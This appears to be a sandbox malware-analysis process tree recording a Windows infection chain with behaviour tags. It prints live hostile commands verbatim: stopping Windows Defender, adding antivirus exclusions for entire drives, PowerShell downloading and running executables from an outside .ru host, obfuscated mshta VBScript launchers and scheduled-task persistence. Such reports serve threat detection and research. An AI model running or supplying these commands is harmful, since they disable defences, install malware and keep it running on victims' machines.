C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 6169⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat0188dba58af938.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat0188dba58af938.exeSat0188dba58af938.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe"C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\3dMI4Si0Juc8JmYItUK1_bOX.exe"C:\Users\Admin\Pictures\Adobe Films\3dMI4Si0Juc8JmYItUK1_bOX.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 3968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\pcDa6JJRRSX5ENuJg_ClL7Id.exe"C:\Users\Admin\Pictures\Adobe Films\pcDa6JJRRSX5ENuJg_ClL7Id.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe"C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\cf7e211a-c11f-4071-99b2-1e8cfe44935c\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\cf7e211a-c11f-4071-99b2-1e8cfe44935c\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cf7e211a-c11f-4071-99b2-1e8cfe44935c\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cf7e211a-c11f-4071-99b2-1e8cfe44935c\test.bat"9⤵
-
C:\Windows\system32\sc.exesc stop windefend10⤵
-
C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe"C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe" -Force8⤵
-
C:\Users\Admin\Pictures\Adobe Films\Vgb9MSUHJnGgHNOrMsbi_BKX.exe"C:\Users\Admin\Pictures\Adobe Films\Vgb9MSUHJnGgHNOrMsbi_BKX.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 4008⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\HhHYpWjRp4fWvBG9HSpLlEXd.exe"C:\Users\Admin\Pictures\Adobe Films\HhHYpWjRp4fWvBG9HSpLlEXd.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\x_NIOasvKYPQ56cpcMhnsHLe.exe"C:\Users\Admin\Pictures\Adobe Films\x_NIOasvKYPQ56cpcMhnsHLe.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\fx6ZjM_T3TYXA8Vgl8TM4_N8.exe"C:\Users\Admin\Pictures\Adobe Films\fx6ZjM_T3TYXA8Vgl8TM4_N8.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 2888⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"7⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\soldd.exe"C:\Users\Admin\AppData\Local\Temp\soldd.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/sold.exe', (Join-Path -Path $env:AppData -ChildPath 'sold.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/Amongus.exe', (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'sold.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe')" & exit10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 222812⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 225612⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/sold.exe', (Join-Path -Path $env:AppData -ChildPath 'sold.exe'))"11⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/Amongus.exe', (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe'))"11⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'sold.exe')"11⤵
-
C:\Users\Admin\AppData\Roaming\sold.exe"C:\Users\Admin\AppData\Roaming\sold.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\sold.exe"13⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"14⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services32.exe"14⤵
-
C:\Windows\system32\services32.exeC:\Windows\system32\services32.exe15⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"16⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"17⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost32"18⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "Start-Process -FilePath (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe')"11⤵
-
C:\Users\Admin\Amongus.exe"C:\Users\Admin\Amongus.exe"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\okMapBnuwoKkFkv6DNJnxaAd.exe"C:\Users\Admin\Pictures\Adobe Films\okMapBnuwoKkFkv6DNJnxaAd.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\MSMT3yGmzXPkyNGU4Ioc_cX7.exe"C:\Users\Admin\Pictures\Adobe Films\MSMT3yGmzXPkyNGU4Ioc_cX7.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\qWZSTdOhU4VG7egnd7FPanGp.exe"C:\Users\Admin\Pictures\Adobe Films\qWZSTdOhU4VG7egnd7FPanGp.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\FOGl6ElFqFbTpkovg9hhVPi3.exe"C:\Users\Admin\Pictures\Adobe Films\FOGl6ElFqFbTpkovg9hhVPi3.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\o9uSZntIwqe93u3YXgjwODAp.exe"C:\Users\Admin\Pictures\Adobe Films\o9uSZntIwqe93u3YXgjwODAp.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\X4IAaOgGcZikswnm7TOgIOSW.exe"C:\Users\Admin\Documents\X4IAaOgGcZikswnm7TOgIOSW.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\hSVVqJwu9dgzLuTpwGyxJgix.exe"C:\Users\Admin\Pictures\Adobe Films\hSVVqJwu9dgzLuTpwGyxJgix.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe"C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "0GGbjtnpTTrbzG7u2or4q7_l.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\dPDD1_x1AYINcoVmULBbF_RG.exe"C:\Users\Admin\Pictures\Adobe Films\dPDD1_x1AYINcoVmULBbF_RG.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 174410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\KngXFzzriYmz7oZXLnNJ7Oje.exe"C:\Users\Admin\Pictures\Adobe Films\KngXFzzriYmz7oZXLnNJ7Oje.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 23610⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\qMMgF0iy9oz3KXaRZNQHcx4E.exe"C:\Users\Admin\Pictures\Adobe Films\qMMgF0iy9oz3KXaRZNQHcx4E.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\FBowEu9d0daGixRU4W9LGBHi.exe"C:\Users\Admin\Pictures\Adobe Films\FBowEu9d0daGixRU4W9LGBHi.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\jfn8vpxKNthDu5DnWkBIAFRS.exe"C:\Users\Admin\Pictures\Adobe Films\jfn8vpxKNthDu5DnWkBIAFRS.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff86290dec0,0x7ff86290ded0,0x7ff86290dee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=1960 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1580 /prefetch:212⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=2072 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2508 /prefetch:112⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2516 /prefetch:112⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3224 /prefetch:212⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=1732 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=3588 /prefetch:812⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=3360 /prefetch:812⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=2076 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=1896 /prefetch:812⤵
-
C:\Users\Admin\Pictures\Adobe Films\EfZylDS8gnimdLu50tagoPKK.exe"C:\Users\Admin\Pictures\Adobe Films\EfZylDS8gnimdLu50tagoPKK.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ISJSU.tmp\EfZylDS8gnimdLu50tagoPKK.tmp"C:\Users\Admin\AppData\Local\Temp\is-ISJSU.tmp\EfZylDS8gnimdLu50tagoPKK.tmp" /SL5="$2046E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\EfZylDS8gnimdLu50tagoPKK.exe"10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\LRSqKfZCaNZ_zXzXGAw7tCbk.exe"C:\Users\Admin\Pictures\Adobe Films\LRSqKfZCaNZ_zXzXGAw7tCbk.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\LRSqKfZCaNZ_zXzXGAw7tCbk.exe"C:\Users\Admin\Pictures\Adobe Films\LRSqKfZCaNZ_zXzXGAw7tCbk.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\qm3T17zb2S0FFFQu0bRAfL_O.exe"C:\Users\Admin\Pictures\Adobe Films\qm3T17zb2S0FFFQu0bRAfL_O.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\LF6wUUS4Bh5t4GsH_50X1G6X.exe"C:\Users\Admin\Pictures\Adobe Films\LF6wUUS4Bh5t4GsH_50X1G6X.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\UHmIhzTPjA7Udq7mHDS7iVT8.exe"C:\Users\Admin\Pictures\Adobe Films\UHmIhzTPjA7Udq7mHDS7iVT8.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\t2RSCnrA9J7oKhlzpAzxT6n3.exe"C:\Users\Admin\Pictures\Adobe Films\t2RSCnrA9J7oKhlzpAzxT6n3.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe"C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe" ) do taskkill -im "%~NxK" -F9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "F_Evme4OtUMIPukX3RuShUdN.exe" -F10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵
-
